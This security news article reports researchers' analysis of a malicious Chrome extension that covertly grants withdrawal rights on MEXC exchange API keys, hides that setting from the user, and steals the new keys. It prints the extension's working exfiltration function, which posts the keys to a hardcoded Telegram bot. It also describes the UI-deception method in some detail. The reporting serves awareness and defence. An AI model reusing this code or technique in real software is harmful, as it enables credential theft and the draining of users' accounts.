Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

A malicious Chrome extension called MEXC API Automator is abusing trust in browser add-ons to steal cryptocurrency trading access from MEXC users.

Posed as a tool that helps automate trading and API key creation, it quietly takes control of newly created API keys and turns a normal browser session into a full account takeover channel.

The attack starts from a legitimate-looking Chrome Web Store listing that promises “easy API key creation with trading and withdrawal access” for the MEXC exchange.

Once installed, the extension activates when the victim opens MEXC’s API management page, where users normally create keys for bots and automated trading.

From there, it can silently create powerful keys, trigger trades, and enable withdrawals across a global user base.

Besides this, the MEXC interface that targeted users see as normal during this process.

After reviewing the extension, Socket.dev researchers identified it as outright malware and linked it to a threat actor using the handle jorjortan142.

Their analysis showed that the code runs only inside the already logged-in MEXC session, which means traditional password theft is not even needed.

The API automator highlights how the Chrome Web Store branding is used to build trust.

Instead of stealing passwords, the extension focuses on MEXC API keys that allow both trading and withdrawals. These keys often live for a long time, are reused in bots and scripts, and are not watched as closely as interactive logins.

As soon as a fresh key appears in the success popup, the extension grabs it and prepares it for exfiltration to attacker-controlled Telegram infrastructure.

This report now looks at how the extension infects the browser session, hides dangerous settings, and sends stolen data out in the background. The scanner detection shows Socket AI Scanner flagging this behavior inside the extension code.

Infection Mechanism, UI Deception, and Telegram Exfiltration

MEXC API Automator is a Manifest V3 Chrome extension that injects a single content script, script.js, into the URL pattern ://.mexc.com/user/openapi*.

When the victim opens this page, the script waits for the DOM to load, finds the API creation form, and programmatically selects all permission checkboxes, including withdrawals, without any extra clicks from the user.

To fool the victim, the script then tampers with the page styles so the withdrawal option looks disabled even though it stays enabled on the server side.

It strips the “checked” class from the withdraw checkbox, hides the visual tick mark with injected CSS, and uses a MutationObserver to remove the class again if MEXC’s own code restores it.

The victim thinks only trading is allowed, but the submitted form actually carries full withdrawal rights.

When the exchange shows the success modal with the new Access Key and Secret Key, the script scrapes both values straight from the DOM and sends them to a hardcoded Telegram bot and chat ID in the background.

The core of this behavior appears in a simple function:-

function sendKeysToTelegram(apiKey, secretKey) {
  const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I';
  const chatId  = '6526634583';
  fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}nSecret Key: ${secretKey}` })
  });
}

Since the extension stays inside the browser sandbox, reads only page content, and sends data over normal HTTPS, it blends into regular web traffic.

By the time a victim notices strange trades or missing funds, the attacker has already loaded the keys into scripts or tools that can drain accounts without ever touching the user’s password.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.